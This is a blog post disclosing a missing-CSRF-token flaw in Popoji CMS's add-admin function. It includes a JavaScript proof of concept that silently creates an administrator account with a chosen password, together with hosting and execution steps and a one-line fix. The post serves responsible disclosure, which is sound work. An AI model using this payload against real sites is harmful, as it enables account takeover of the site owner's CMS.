Missing CSRF Token On Add Admin [Popoji CMS]

Description:

This is happen because when request add admin there’s no CSRF token
Step To Reproduce :

<script>function getMe(){
// retrieve page content
var xhr = new XMLHttpRequest();
// now execute the CSRF attack
xhr.open("POST", "http://root/popoji/poadmin/
route.php?mod=user&act=addnew", true);
xhr.withCredentials="true";
xhr.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
xhr.send('username=root&nama_lengkap=test&password=Mypass1337&repeatpass=Mypass1337&email=nosashan
dy21%40gmail.com&no_telp=083833232954&level=1');
}
</script>
<button>Let's Rock</button>

1. Save code to .html
2. upload them to host
3. execute it.

Video :

https://www.youtube.com/watch?v=1FXXuSiB6jo

Fix & Mitigation :

give token when request sensitive action.

Note:
them give me permission to disclose it, and they say the patch will deployed for next version. So, if you use popoji CMS, be careful, dont trust any link from unknown people and stay update your CMS. and also them give me bounty for this! yeey !

Published by

apapedulimu

Urip Kui Urup

Leave a Reply

Your email address will not be published. Required fields are marked *